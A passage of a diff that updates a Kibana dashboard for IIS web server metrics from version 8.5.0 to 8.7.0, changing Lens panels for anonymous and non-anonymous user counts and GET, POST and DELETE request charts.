"index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "4c16bca9-c2d9-43d0-ae94-22640d5d1137": { + "columnOrder": [ + "4bab5c46-e3e5-47e0-be7b-e2e629489c37", + "7ec66ded-570f-443c-b240-5b9ae05a154f", + "7ec66ded-570f-443c-b240-5b9ae05a154fX0", + "7ec66ded-570f-443c-b240-5b9ae05a154fX1" + ], + "columns": { + "4bab5c46-e3e5-47e0-be7b-e2e629489c37": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "iis.webserver.network.current_anonymous_users: *" + }, + "isBucketed": false, + "label": "Current Anonymous Users", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.webserver.network.current_anonymous_users" }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true - }, - "gridData": { - "h": 9, - "i": "73702fa8-d011-45cc-af6c-9dd7c55701d9", - "w": 9, - "x": 39, - "y": 0 - }, - "panelIndex": "73702fa8-d011-45cc-af6c-9dd7c55701d9", - "title": "Total Connection Attempts", - "type": "lens", - "version": "8.5.0" + "7ec66ded-570f-443c-b240-5b9ae05a154f": { + "dataType": "number", + "isBucketed": false, + "label": "overall_max(last_value(iis.webserver.network.current_anonymous_users))", + "operationType": "formula", + "params": { + "formula": "overall_max(last_value(iis.webserver.network.current_anonymous_users))", + "isFormulaBroken": false + }, + "references": [ + "7ec66ded-570f-443c-b240-5b9ae05a154fX1" + ], + "scale": "ratio" + }, + "7ec66ded-570f-443c-b240-5b9ae05a154fX0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "iis.webserver.network.current_anonymous_users: *" + }, + "isBucketed": false, + "label": "Part of overall_max(last_value(iis.webserver.network.current_anonymous_users))", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.webserver.network.current_anonymous_users" + }, + "7ec66ded-570f-443c-b240-5b9ae05a154fX1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of overall_max(last_value(iis.webserver.network.current_anonymous_users))", + "operationType": "overall_max", + "references": [ + "7ec66ded-570f-443c-b240-5b9ae05a154fX0" + ], + "scale": "ratio" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#31D315", + "layerId": "4c16bca9-c2d9-43d0-ae94-22640d5d1137", + "layerType": "data", + "maxAccessor": "7ec66ded-570f-443c-b240-5b9ae05a154f", + "metricAccessor": "4bab5c46-e3e5-47e0-be7b-e2e629489c37", + "progressDirection": "horizontal" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-4c16bca9-c2d9-43d0-ae94-22640d5d1137", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "4c16bca9-c2d9-43d0-ae94-22640d5d1137": { - "columnOrder": [ - "4bab5c46-e3e5-47e0-be7b-e2e629489c37", - "7ec66ded-570f-443c-b240-5b9ae05a154f", - "7ec66ded-570f-443c-b240-5b9ae05a154fX0", - "7ec66ded-570f-443c-b240-5b9ae05a154fX1" - ], - "columns": { - "4bab5c46-e3e5-47e0-be7b-e2e629489c37": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "iis.webserver.network.current_anonymous_users: *" - }, - "isBucketed": false, - "label": "Current Anonymous Users", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.webserver.network.current_anonymous_users" - }, - "7ec66ded-570f-443c-b240-5b9ae05a154f": { - "dataType": "number", - "isBucketed": false, - "label": "overall_max(last_value(iis.webserver.network.current_anonymous_users))", - "operationType": "formula", - "params": { - "formula": "overall_max(last_value(iis.webserver.network.current_anonymous_users))", - "isFormulaBroken": false - }, - "references": [ - "7ec66ded-570f-443c-b240-5b9ae05a154fX1" - ], - "scale": "ratio" - }, - "7ec66ded-570f-443c-b240-5b9ae05a154fX0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "iis.webserver.network.current_anonymous_users: *" - }, - "isBucketed": false, - "label": "Part of overall_max(last_value(iis.webserver.network.current_anonymous_users))", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.webserver.network.current_anonymous_users" - }, - "7ec66ded-570f-443c-b240-5b9ae05a154fX1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of overall_max(last_value(iis.webserver.network.current_anonymous_users))", - "operationType": "overall_max", - "references": [ - "7ec66ded-570f-443c-b240-5b9ae05a154fX0" - ], - "scale": "ratio" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "color": "#31D315", - "layerId": "4c16bca9-c2d9-43d0-ae94-22640d5d1137", - "layerType": "data", - "maxAccessor": "7ec66ded-570f-443c-b240-5b9ae05a154f", - "metricAccessor": "4bab5c46-e3e5-47e0-be7b-e2e629489c37", - "progressDirection": "horizontal" - } + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" + }, + "title": "Current Anonymous Users" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 8, + "i": "cbb280fb-dbc3-4b82-9c48-788c4254619d", + "w": 5, + "x": 5, + "y": 5 + }, + "panelIndex": "cbb280fb-dbc3-4b82-9c48-788c4254619d", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-264d96bd-c47d-47c0-bb24-eb3d1a4dd46a", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "264d96bd-c47d-47c0-bb24-eb3d1a4dd46a": { + "columnOrder": [ + "8b88a552-aee2-4ae6-969f-c86a52662140", + "a142e987-a48e-4795-aab6-697aeeebe0c1", + "a142e987-a48e-4795-aab6-697aeeebe0c1X0", + "a142e987-a48e-4795-aab6-697aeeebe0c1X1" + ], + "columns": { + "8b88a552-aee2-4ae6-969f-c86a52662140": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "iis.webserver.network.total_anonymous_users: *" + }, + "isBucketed": false, + "label": "Total Anonymous Users", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.webserver.network.total_anonymous_users" }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true - }, - "gridData": { - "h": 8, - "i": "c523cd66-328a-41e9-bce9-1e1f95bae5de", - "w": 5, - "x": 0, - "y": 5 - }, - "panelIndex": "c523cd66-328a-41e9-bce9-1e1f95bae5de", - "title": "Current Anonymous Users", - "type": "lens", - "version": "8.5.0" + "a142e987-a48e-4795-aab6-697aeeebe0c1": { + "dataType": "number", + "isBucketed": false, + "label": "overall_max(last_value(iis.webserver.network.total_anonymous_users))", + "operationType": "formula", + "params": { + "formula": "overall_max(last_value(iis.webserver.network.total_anonymous_users))", + "isFormulaBroken": false + }, + "references": [ + "a142e987-a48e-4795-aab6-697aeeebe0c1X1" + ], + "scale": "ratio" + }, + "a142e987-a48e-4795-aab6-697aeeebe0c1X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "iis.webserver.network.total_anonymous_users: *" + }, + "isBucketed": false, + "label": "Part of overall_max(last_value(iis.webserver.network.total_anonymous_users))", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.webserver.network.total_anonymous_users" + }, + "a142e987-a48e-4795-aab6-697aeeebe0c1X1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of overall_max(last_value(iis.webserver.network.total_anonymous_users))", + "operationType": "overall_max", + "references": [ + "a142e987-a48e-4795-aab6-697aeeebe0c1X0" + ], + "scale": "ratio" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#1544D3", + "layerId": "264d96bd-c47d-47c0-bb24-eb3d1a4dd46a", + "layerType": "data", + "maxAccessor": "a142e987-a48e-4795-aab6-697aeeebe0c1", + "metricAccessor": "8b88a552-aee2-4ae6-969f-c86a52662140", + "progressDirection": "horizontal" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-264d96bd-c47d-47c0-bb24-eb3d1a4dd46a", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" + }, + "title": "Total Anonymous Users" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 12, + "i": "89279953-dda3-4340-b049-bb52c2cbbeb8", + "w": 38, + "x": 10, + "y": 9 + }, + "panelIndex": "89279953-dda3-4340-b049-bb52c2cbbeb8", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-61df5fc7-b10c-4aba-9ef7-4f40a34d9419", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-6cb1d19a-e033-4dc3-8aa4-0eef6b6ebb42", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-8238eaa5-3c3c-46e9-9a09-abee137c1fbf", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "61df5fc7-b10c-4aba-9ef7-4f40a34d9419": { + "columnOrder": [ + "60bf28a7-9653-4be5-b5d3-9440ac2fb976", + "e3e9750c-ab86-4e3b-8ef8-ba4e958722be" + ], + "columns": { + "60bf28a7-9653-4be5-b5d3-9440ac2fb976": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "e3e9750c-ab86-4e3b-8ef8-ba4e958722be": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Total Get Requests", + "operationType": "max", + "params": { + "emptyAsNull": true, + "format": { + "id": "number", + "params": { + "decimals": 1 + } } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "264d96bd-c47d-47c0-bb24-eb3d1a4dd46a": { - "columnOrder": [ - "8b88a552-aee2-4ae6-969f-c86a52662140", - "a142e987-a48e-4795-aab6-697aeeebe0c1", - "a142e987-a48e-4795-aab6-697aeeebe0c1X0", - "a142e987-a48e-4795-aab6-697aeeebe0c1X1" - ], - "columns": { - "8b88a552-aee2-4ae6-969f-c86a52662140": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "iis.webserver.network.total_anonymous_users: *" - }, - "isBucketed": false, - "label": "Total Anonymous Users", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.webserver.network.total_anonymous_users" - }, - "a142e987-a48e-4795-aab6-697aeeebe0c1": { - "dataType": "number", - "isBucketed": false, - "label": "overall_max(last_value(iis.webserver.network.total_anonymous_users))", - "operationType": "formula", - "params": { - "formula": "overall_max(last_value(iis.webserver.network.total_anonymous_users))", - "isFormulaBroken": false - }, - "references": [ - "a142e987-a48e-4795-aab6-697aeeebe0c1X1" - ], - "scale": "ratio" - }, - "a142e987-a48e-4795-aab6-697aeeebe0c1X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "iis.webserver.network.total_anonymous_users: *" - }, - "isBucketed": false, - "label": "Part of overall_max(last_value(iis.webserver.network.total_anonymous_users))", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.webserver.network.total_anonymous_users" - }, - "a142e987-a48e-4795-aab6-697aeeebe0c1X1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of overall_max(last_value(iis.webserver.network.total_anonymous_users))", - "operationType": "overall_max", - "references": [ - "a142e987-a48e-4795-aab6-697aeeebe0c1X0" - ], - "scale": "ratio" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "color": "#1544D3", - "layerId": "264d96bd-c47d-47c0-bb24-eb3d1a4dd46a", - "layerType": "data", - "maxAccessor": "a142e987-a48e-4795-aab6-697aeeebe0c1", - "metricAccessor": "8b88a552-aee2-4ae6-969f-c86a52662140", - "progressDirection": "horizontal" + }, + "scale": "ratio", + "sourceField": "iis.webserver.network.total_get_requests" + } + }, + "incompleteColumns": {} + }, + "6cb1d19a-e033-4dc3-8aa4-0eef6b6ebb42": { + "columnOrder": [ + "bd0259dd-9745-4775-959f-b23323d92557", + "78775ee6-ee5b-484b-ab6f-dc15b5d7dcc6" + ], + "columns": { + "78775ee6-ee5b-484b-ab6f-dc15b5d7dcc6": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Total Delete Requests", + "operationType": "max", + "params": { + "emptyAsNull": true, + "format": { + "id": "number", + "params": { + "decimals": 1 + } } + }, + "scale": "ratio", + "sourceField": "iis.webserver.network.total_delete_requests" }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" + "bd0259dd-9745-4775-959f-b23323d92557": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} }, - "enhancements": {}, - "hidePanelTitles": true - }, - "gridData": { - "h": 8, - "i": "cbb280fb-dbc3-4b82-9c48-788c4254619d", - "w": 5, - "x": 5, - "y": 5 - }, - "panelIndex": "cbb280fb-dbc3-4b82-9c48-788c4254619d", - "title": "Total Anonymous Users", - "type": "lens", - "version": "8.5.0" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-61df5fc7-b10c-4aba-9ef7-4f40a34d9419", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-6cb1d19a-e033-4dc3-8aa4-0eef6b6ebb42", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-8238eaa5-3c3c-46e9-9a09-abee137c1fbf", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "61df5fc7-b10c-4aba-9ef7-4f40a34d9419": { - "columnOrder": [ - "60bf28a7-9653-4be5-b5d3-9440ac2fb976", - "e3e9750c-ab86-4e3b-8ef8-ba4e958722be" - ], - "columns": { - "60bf28a7-9653-4be5-b5d3-9440ac2fb976": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "e3e9750c-ab86-4e3b-8ef8-ba4e958722be": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Total Get Requests", - "operationType": "max", - "params": { - "emptyAsNull": true, - "format": { - "id": "number", - "params": { - "decimals": 1 - } - } - }, - "scale": "ratio", - "sourceField": "iis.webserver.network.total_get_requests" - } - }, - "incompleteColumns": {} - }, - "6cb1d19a-e033-4dc3-8aa4-0eef6b6ebb42": { - "columnOrder": [ - "bd0259dd-9745-4775-959f-b23323d92557", - "78775ee6-ee5b-484b-ab6f-dc15b5d7dcc6" - ], - "columns": { - "78775ee6-ee5b-484b-ab6f-dc15b5d7dcc6": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Total Delete Requests", - "operationType": "max", - "params": { - "emptyAsNull": true, - "format": { - "id": "number", - "params": { - "decimals": 1 - } - } - }, - "scale": "ratio", - "sourceField": "iis.webserver.network.total_delete_requests" - }, - "bd0259dd-9745-4775-959f-b23323d92557": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - }, - "8238eaa5-3c3c-46e9-9a09-abee137c1fbf": { - "columnOrder": [ - "71364c0c-46e6-47c9-8ebf-7badce75f44e", - "15e96662-9271-4462-9248-089a5b1f6049" - ], - "columns": { - "15e96662-9271-4462-9248-089a5b1f6049": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Total Post Requests", - "operationType": "max", - "params": { - "emptyAsNull": true, - "format": { - "id": "number", - "params": { - "decimals": 1 - } - } - }, - "scale": "ratio", - "sourceField": "iis.webserver.network.total_post_requests" - }, - "71364c0c-46e6-47c9-8ebf-7badce75f44e": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "fillOpacity": 0, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "e3e9750c-ab86-4e3b-8ef8-ba4e958722be" - ], - "layerId": "61df5fc7-b10c-4aba-9ef7-4f40a34d9419", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "seriesType": "line", - "xAccessor": "60bf28a7-9653-4be5-b5d3-9440ac2fb976", - "yConfig": [ - { - "axisMode": "left", - "color": "#3185FC", - "forAccessor": "e3e9750c-ab86-4e3b-8ef8-ba4e958722be" - } - ] - }, - { - "accessors": [ - "15e96662-9271-4462-9248-089a5b1f6049" - ], - "layerId": "8238eaa5-3c3c-46e9-9a09-abee137c1fbf", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "seriesType": "line", - "xAccessor": "71364c0c-46e6-47c9-8ebf-7badce75f44e", - "yConfig": [ - { - "axisMode": "left", - "color": "#68BC00", - "forAccessor": "15e96662-9271-4462-9248-089a5b1f6049" - } - ] - }, - { - "accessors": [ - "78775ee6-ee5b-484b-ab6f-dc15b5d7dcc6" - ], - "layerId": "6cb1d19a-e033-4dc3-8aa4-0eef6b6ebb42", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "seriesType": "line", - "xAccessor": "bd0259dd-9745-4775-959f-b23323d92557", - "yConfig": [ - { - "axisMode": "left", - "color": "rgba(149,0,188,1)", - "forAccessor": "78775ee6-ee5b-484b-ab6f-dc15b5d7dcc6" - } - ] - } - ], - "legend": { - "isVisible": true, - "maxLines": 1, - "position": "right", - "shouldTruncate": true, - "showSingleSeries": true - }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "valuesInLegend": true, - "yLeftExtent": { - "mode": "full" - }, - "yRightExtent": { - "mode": "full" - }, - "yTitle": "" + "8238eaa5-3c3c-46e9-9a09-abee137c1fbf": { + "columnOrder": [ + "71364c0c-46e6-47c9-8ebf-7badce75f44e", + "15e96662-9271-4462-9248-089a5b1f6049" + ], + "columns": { + "15e96662-9271-4462-9248-089a5b1f6049": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Total Post Requests", + "operationType": "max", + "params": { + "emptyAsNull": true, + "format": { + "id": "number", + "params": { + "decimals": 1 + } } + }, + "scale": "ratio", + "sourceField": "iis.webserver.network.total_post_requests" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "71364c0c-46e6-47c9-8ebf-7badce75f44e": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "fillOpacity": 0, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "e3e9750c-ab86-4e3b-8ef8-ba4e958722be" + ], + "layerId": "61df5fc7-b10c-4aba-9ef7-4f40a34d9419", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" }, - "enhancements": {}, - "hidePanelTitles": false + "seriesType": "line", + "xAccessor": "60bf28a7-9653-4be5-b5d3-9440ac2fb976", + "yConfig": [ + { + "axisMode": "left", + "color": "#3185FC", + "forAccessor": "e3e9750c-ab86-4e3b-8ef8-ba4e958722be" + } + ] + }, + { + "accessors": [ + "15e96662-9271-4462-9248-089a5b1f6049" + ], + "layerId": "8238eaa5-3c3c-46e9-9a09-abee137c1fbf", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" + }, + "seriesType": "line", + "xAccessor": "71364c0c-46e6-47c9-8ebf-7badce75f44e", + "yConfig": [ + { + "axisMode": "left", + "color": "#68BC00", + "forAccessor": "15e96662-9271-4462-9248-089a5b1f6049" + } + ] + }, + { + "accessors": [ + "78775ee6-ee5b-484b-ab6f-dc15b5d7dcc6" + ], + "layerId": "6cb1d19a-e033-4dc3-8aa4-0eef6b6ebb42", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" + }, + "seriesType": "line", + "xAccessor": "bd0259dd-9745-4775-959f-b23323d92557", + "yConfig": [ + { + "axisMode": "left", + "color": "rgba(149,0,188,1)", + "forAccessor": "78775ee6-ee5b-484b-ab6f-dc15b5d7dcc6" + } + ] + } + ], + "legend": { + "isVisible": true, + "maxLines": 1, + "position": "right", + "shouldTruncate": true, + "showSingleSeries": true + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "gridData": { - "h": 12, - "i": "89279953-dda3-4340-b049-bb52c2cbbeb8", - "w": 38, - "x": 10, - "y": 9 + "valueLabels": "hide", + "valuesInLegend": true, + "yLeftExtent": { + "mode": "full" }, - "panelIndex": "89279953-dda3-4340-b049-bb52c2cbbeb8", - "title": "Total Requests", - "type": "lens", - "version": "8.5.0" + "yRightExtent": { + "mode": "full" + }, + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-cfcc9b57-93b7-4830-9c93-82a29dc4aeee", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "cfcc9b57-93b7-4830-9c93-82a29dc4aeee": { - "columnOrder": [ - "42783e77-7593-4488-bf9a-552f283b7e09", - "4047663d-033d-43bf-bacf-d051cc00fedc", - "4047663d-033d-43bf-bacf-d051cc00fedcX0", - "4047663d-033d-43bf-bacf-d051cc00fedcX1" - ], - "columns": { - "4047663d-033d-43bf-bacf-d051cc00fedc": { - "dataType": "number", - "isBucketed": false, - "label": "overall_max(last_value(iis.webserver.network.current_non_anonymous_users))", - "operationType": "formula", - "params": { - "formula": "overall_max(last_value(iis.webserver.network.current_non_anonymous_users))", - "isFormulaBroken": false - }, - "references": [ - "4047663d-033d-43bf-bacf-d051cc00fedcX1" - ], - "scale": "ratio" - }, - "4047663d-033d-43bf-bacf-d051cc00fedcX0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "iis.webserver.network.current_non_anonymous_users: *" - }, - "isBucketed": false, - "label": "Part of overall_max(last_value(iis.webserver.network.current_non_anonymous_users))", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.webserver.network.current_non_anonymous_users" - }, - "4047663d-033d-43bf-bacf-d051cc00fedcX1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of overall_max(last_value(iis.webserver.network.current_non_anonymous_users))", - "operationType": "overall_max", - "references": [ - "4047663d-033d-43bf-bacf-d051cc00fedcX0" - ], - "scale": "ratio" - }, - "42783e77-7593-4488-bf9a-552f283b7e09": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "iis.webserver.network.current_non_anonymous_users: *" - }, - "isBucketed": false, - "label": "Current Non Anonymous Users", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.webserver.network.current_non_anonymous_users" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "color": "#AB15D3", - "layerId": "cfcc9b57-93b7-4830-9c93-82a29dc4aeee", - "layerType": "data", - "maxAccessor": "4047663d-033d-43bf-bacf-d051cc00fedc", - "metricAccessor": "42783e77-7593-4488-bf9a-552f283b7e09", - "progressDirection": "horizontal" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Total Requests" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 8, + "i": "bb345920-7514-400f-a69e-be2625824248", + "w": 5, + "x": 0, + "y": 13 + }, + "panelIndex": "bb345920-7514-400f-a69e-be2625824248", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-cfcc9b57-93b7-4830-9c93-82a29dc4aeee", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "cfcc9b57-93b7-4830-9c93-82a29dc4aeee": { + "columnOrder": [ + "42783e77-7593-4488-bf9a-552f283b7e09", + "4047663d-033d-43bf-bacf-d051cc00fedc", + "4047663d-033d-43bf-bacf-d051cc00fedcX0", + "4047663d-033d-43bf-bacf-d051cc00fedcX1" + ], + "columns": { + "4047663d-033d-43bf-bacf-d051cc00fedc": { + "dataType": "number", + "isBucketed": false, + "label": "overall_max(last_value(iis.webserver.network.current_non_anonymous_users))", + "operationType": "formula", + "params": { + "formula": "overall_max(last_value(iis.webserver.network.current_non_anonymous_users))", + "isFormulaBroken": false + }, + "references": [ + "4047663d-033d-43bf-bacf-d051cc00fedcX1" + ], + "scale": "ratio" + }, + "4047663d-033d-43bf-bacf-d051cc00fedcX0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "iis.webserver.network.current_non_anonymous_users: *" + }, + "isBucketed": false, + "label": "Part of overall_max(last_value(iis.webserver.network.current_non_anonymous_users))", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.webserver.network.current_non_anonymous_users" + }, + "4047663d-033d-43bf-bacf-d051cc00fedcX1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of overall_max(last_value(iis.webserver.network.current_non_anonymous_users))", + "operationType": "overall_max", + "references": [ + "4047663d-033d-43bf-bacf-d051cc00fedcX0" + ], + "scale": "ratio" + }, + "42783e77-7593-4488-bf9a-552f283b7e09": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "iis.webserver.network.current_non_anonymous_users: *" + }, + "isBucketed": false, + "label": "Current Non Anonymous Users", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.webserver.network.current_non_anonymous_users" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#AB15D3", + "layerId": "cfcc9b57-93b7-4830-9c93-82a29dc4aeee", + "layerType": "data", + "maxAccessor": "4047663d-033d-43bf-bacf-d051cc00fedc", + "metricAccessor": "42783e77-7593-4488-bf9a-552f283b7e09", + "progressDirection": "horizontal" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" + }, + "title": "Current Non Anonymous Users" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 8, + "i": "d35799cc-1fd4-4ec8-8e94-56b5ee21cc69", + "w": 5, + "x": 5, + "y": 13 + }, + "panelIndex": "d35799cc-1fd4-4ec8-8e94-56b5ee21cc69", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-c8eba081-fa85-43a3-adee-81a6c126dd30", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "c8eba081-fa85-43a3-adee-81a6c126dd30": { + "columnOrder": [ + "18a755c6-6629-48e2-a173-4401811e0776", + "deefd9f8-8a6f-4a22-ab4a-4c7e69e5726d", + "deefd9f8-8a6f-4a22-ab4a-4c7e69e5726dX0", + "deefd9f8-8a6f-4a22-ab4a-4c7e69e5726dX1" + ], + "columns": { + "18a755c6-6629-48e2-a173-4401811e0776": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "iis.webserver.network.total_non_anonymous_users: *" + }, + "isBucketed": false, + "label": "Total Non Anonymous Users", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.webserver.network.total_non_anonymous_users" + }, + "deefd9f8-8a6f-4a22-ab4a-4c7e69e5726d": { + "dataType": "number", + 